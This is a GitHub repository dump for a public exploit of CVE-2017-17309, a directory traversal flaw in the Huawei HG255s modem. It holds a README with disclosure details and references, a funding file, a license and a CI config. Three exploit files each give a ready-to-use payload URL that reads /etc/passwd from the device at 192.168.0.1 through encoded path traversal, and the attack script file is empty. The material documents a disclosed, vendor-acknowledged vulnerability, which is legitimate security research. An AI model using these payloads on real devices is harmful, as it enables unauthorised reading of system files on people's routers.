├── .github └── FUNDING.yml ├── LICENSE ├── README.md ├── exploit ├── huawei_hg255_exploit_1.txt ├── huawei_hg255_exploit_2.txt └── huawei_hg255_exploit_3.txt └── tools ├── .travis.yml └── hg255s_attack.py /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: ismailtasdelen 4 | patreon: ismailtasdelen 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: ismailtasdelen 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 13 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 İSMAİL TAŞDELEN 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### Server Directory Traversal at Huawei HG255s - CVE-2017-17309 2 | 3 | ![huawei](https://user-images.githubusercontent.com/15425071/31989903-489b48fa-b97c-11e7-8698-ea794276d08a.png) 4 | 5 |

6 | 7 |

8 | 9 | ##### Letter of Thanks 10 | 11 | ![letterofthanks](https://user-images.githubusercontent.com/15425071/31990117-d75894e4-b97c-11e7-8275-6909a6b47b48.png) 12 | 13 | #### Exploit Title: [Server Directory Traversal at Huawei HG255s] 14 | 15 | #### Exploit Author: [Ismail Tasdelen] 16 | 17 | #### CVE : CVE-2017-17309 18 | 19 | #### Vendor Homepage: [[www.huawei.com](https://www.huawei.com)] 20 | 21 | #### Software Link: [Not published this modem just used by Turkey] 22 | 23 | #### Version: [V100R001C163B025SP02] 24 | 25 | ![cve-2017-17309](https://user-images.githubusercontent.com/15425071/39086966-c989b58a-45a1-11e8-9a7e-abbb34393ba9.PNG) 26 | 27 | ##### Finding Vulnerabilities and Approved Exploits 28 | 29 | * [Server Directory Traversal at Huawei HG255s - 1](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_1.txt) 30 | 31 | * [Server Directory Traversal at Huawei HG255s - 2](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_2.txt) 32 | 33 | * [Server Directory Traversal at Huawei HG255s - 3](https://github.com/ismailtasdelen/huawei_hg255s_exploit/blob/master/exploit/huawei_hg255_exploit_3.txt) 34 | 35 | ##### References : 36 | 37 | * https://www.vulnerability-lab.com/get_content.php?id=2099 38 | * https://www.vulnerability-lab.com/get_content.php?id=2100 39 | * https://cxsecurity.com/issue/WLB-2017120035 40 | * https://hackertor.com/2017/12/06/huawei-hg255s-server-directory-traversal/ 41 | * https://www.exploit-database.net/?id=94806 42 | * https://github.com/ismailtasdelen/huawei_hg255s_exploit 43 | * http://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en 44 | * https://nvd.nist.gov/vuln/detail/CVE-2017-17309 45 | * https://www.cvedetails.com/cve/CVE-2017-17309/ 46 | * https://vuldb.com/?id.119545 47 | * https://vulners.com/cve/CVE-2017-17309 48 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17309 49 | -------------------------------------------------------------------------------- /exploit/huawei_hg255_exploit_1.txt: -------------------------------------------------------------------------------- 1 | # Exploit Title: [Server Directory Traversal at Huawei HG255s] 2 | 3 | # Date: [20.10.2017] 4 | 5 | # Exploit Author: [Ismail Tasdelen] 6 | 7 | # Vendor Homepage: [www.huawei.com] 8 | 9 | # Software Link: [Not published this modem just used by Turkey] 10 | 11 | # Version: [V100R001C163B025SP02] 12 | 13 | # POC: 14 | 15 | https://www.youtube.com/watch?v=sWf-at_CqtQ 16 | 17 | Directory Traversal Payload : http://192.168.0.1/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 18 | 19 | # You want to follow my activity ? 20 | 21 | https://www.linkedin.com/in/ismailtasdelen 22 | https://github.com/ismailtasdelen 23 | -------------------------------------------------------------------------------- /exploit/huawei_hg255_exploit_2.txt: -------------------------------------------------------------------------------- 1 | # Exploit Title: [Server Directory Traversal at Huawei HG255s] 2 | 3 | # Date: [22.10.2017] 4 | 5 | # Exploit Author: [Ismail Tasdelen] 6 | 7 | # Vendor Homepage: [www.huawei.com] 8 | 9 | # Software Link: [Not published this modem just used by Turkey] 10 | 11 | # Version: [V100R001C163B025SP02] 12 | 13 | # POC: 14 | 15 | https://www.youtube.com/watch?v=KqFEW2bG7ls 16 | 17 | Directory Traversal Payload : http://192.168.0.1/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 18 | 19 | # You want to follow my activity ? 20 | 21 | https://www.linkedin.com/in/ismailtasdelen 22 | https://github.com/ismailtasdelen 23 | -------------------------------------------------------------------------------- /exploit/huawei_hg255_exploit_3.txt: -------------------------------------------------------------------------------- 1 | # Exploit Title: [Server Directory Traversal at Huawei HG255s] 2 | 3 | # Date: [22.10.2017] 4 | 5 | # Exploit Author: [Ismail Tasdelen] 6 | 7 | # Vendor Homepage: [www.huawei.com] 8 | 9 | # Software Link: [Not published this modem just used by Turkey] 10 | 11 | # Version: [V100R001C163B025SP02] 12 | 13 | # POC: 14 | 15 | https://www.youtube.com/watch?v=h5235yF993o 16 | 17 | Directory Traversal Payload : http://192.168.0.1/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 18 | 19 | # You want to follow my activity ? 20 | 21 | https://www.linkedin.com/in/ismailtasdelen 22 | https://github.com/ismailtasdelen 23 | -------------------------------------------------------------------------------- /tools/.travis.yml: -------------------------------------------------------------------------------- 1 | language: python 2 | python: 3 | - "3.4" 4 | - "3.5" 5 | - "3.6" 6 | # command to install dependencies 7 | install: 8 | - pip install . 9 | # command to run tests 10 | script: 11 | - pytest tests/*.py 12 | -------------------------------------------------------------------------------- /tools/hg255s_attack.py: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------